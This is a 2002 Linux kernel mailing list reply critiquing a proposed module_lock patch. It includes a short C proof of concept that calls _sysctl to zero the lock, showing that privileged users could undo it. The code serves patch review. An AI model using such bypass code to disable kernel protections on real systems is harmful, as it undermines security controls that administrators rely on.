Re: [PATCH] module locking

Anton Altaparmakov (aia21@cantab.net)
Mon, 29 Apr 2002 16:03:18 +0100

At 08:30 29/04/02, Rolf Fokkens wrote:
>On Monday 29 April 2002 09:23, Thomas 'Dent' Mirlacher wrote:
> > the capable call is sthell there, but with the module_lock
> > kind or redundant.
>
>once set module_lock cannot be cleared, not even by root. This differs from
>the CAP_SYS_MODULE which can be activated by root, if I'm correct.
>
>module_lock is only a suggestion, w/o /dev/kmem write locking or even
>locking writes on other /dev/.. or doing mounts it won't be full proof.

*sigh*

RTFM man 2 sysctl

With your patch applied AND module_lock set to 1, anyone with sufficient
privileges could still do:

#include <linux/unistd.h>
#include <linux/types.h>
#include <linux/sysctl.h>

_syscall1(int, _sysctl, struct __sysctl_args *, args);
#define SIZE(x) sizeof(x)/sizeof(x[0])

int main(void)
{
int name[] = { CTL_KERN, KERN_MODPROBE };
int hack = 0;
struct __sysctl_args args = { name, SIZE(name), 0, 0,
&hack, sizeof(hack) };

if (_sysctl(&args)) {
perror("sysctl failed");
exit(1);
}
printf("module_lock has been zeroed! Muahaha!");
return 0;
}

Good bye module_lock! /me waves

What was that about not being able to zero it again...?

Best regards,

Anton

-- 
   "I've not lost my mind. It's backed up on tape somewhere." - Unknown

-- 
Anton Altaparmakov <aia21 at cantab.net> (replace at with @)
Linux NTFS Maintainer / IRC: #ntfs on irc.openprojects.net
WWW: http://linux-ntfs.sf.net/ & http://www-stu.christs.cam.ac.uk/~aia21/


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/